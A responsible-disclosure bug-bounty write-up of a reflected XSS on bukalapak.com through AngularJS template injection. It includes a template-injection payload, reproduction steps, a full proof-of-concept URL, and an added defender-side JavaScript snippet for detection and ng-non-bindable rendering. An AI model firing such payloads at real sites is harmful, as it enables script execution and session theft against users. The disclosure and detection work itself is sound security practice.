Reflected XSS On Search Product via AngularJS Template Injection [ Bukalapak.com ]

Description :

I found a Reflected XSS on www.bukalapak.com via AngularJS. I discovered it by entering {{31338-1}} on their search page and seeing the result 31337 rendered, which shows that the search term is evaluated by AngularJS as a template expression. I also read the H1 report from ysx as a reference for exploiting this.

I then used the payload from ysx to exploit AngularJS: {{constructor.constructor('alert(document.domain)')()}}.

POC (How to reproduce):

  1. Log in to an account.
  2. Enter the payload in the search field.
  3. The XSS fires.

POC URL :

https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D
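The following is an added example, not code from the original report or from Bukalapak, showing how a defender would look at the same PoC URL: it pulls the reflected search term out of the query string, flags AngularJS interpolation markers in it (both the harmless {{31338-1}} probe and the constructor payload are caught by the same check), and renders a search term into an Angular-compiled page with the ng-non-bindable directive, which is what stops the template injection. It assumes Node.js with the WHATWG URL global; the parameter name search[keywords] and the PoC URL are taken from this write-up, and the function names are my own.

```javascript
// Added example (not from the original write-up): defender-side handling of the PoC URL.
// Assumptions: Node.js with the global URL class; the query parameter "search[keywords]"
// is the one reflected into the AngularJS-compiled search page, as the PoC URL shows.

// PoC URL as given in the write-up above.
const POC_URL =
  'https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch' +
  '&search_source=omnisearch_organic' +
  '&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D';

// Extract the reflected search term; URLSearchParams percent-decodes both key and value,
// so "search%5Bkeywords%5D" is looked up as "search[keywords]".
function extractSearchKeywords(url) {
  return new URL(url).searchParams.get('search[keywords]');
}

// Find AngularJS interpolation expressions ({{ ... }}) in untrusted input.
// Returns the inner expressions; a non-empty result is what a detection rule should log,
// because the {{31338-1}} probe and a real payload look identical at this level.
function findInterpolations(input) {
  const found = [];
  const re = /\{\{([\s\S]*?)\}\}/g;
  let m;
  while ((m = re.exec(input)) !== null) found.push(m[1].trim());
  return found;
}

// Standard HTML escaping for text placed into an element body.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Server-side rendering of the search term into a page that AngularJS will compile.
// HTML escaping alone does not stop this bug: "{{" and "}}" contain no HTML metacharacters,
// so they survive escaping and the Angular compiler still evaluates the expression.
// ng-non-bindable tells AngularJS to skip interpolation for this subtree entirely.
function renderSearchTerm(term) {
  return `<span ng-non-bindable>${htmlEscape(term)}</span>`;
}

// Stand-alone run: show what the PoC URL carries and how it would be rendered safely.
const keywords = extractSearchKeywords(POC_URL);
console.log('reflected term :', keywords);
console.log('interpolations :', findInterpolations(keywords));
console.log('safe rendering :', renderSearchTerm(keywords));
```

The detection check is deliberately simple: matching {{ ... }} in a search parameter is a cheap WAF or log-review signal, and the {{31338-1}} arithmetic probe from the write-up is exactly the kind of low-noise event worth alerting on before a real payload arrives. On the fix side, note that escaping is necessary but not sufficient here; either keep user input out of Angular-compiled DOM or mark the element with ng-non-bindable.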

Screenshot:

It was fixed one day after I reported it to them.

Reference :

  1. https://hackerone.com/reports/230234
  2. http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

Note: I got permission from Bukalapak to disclose this report.

For the Indonesian-language version, you can see my original report at: https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3

Thanks!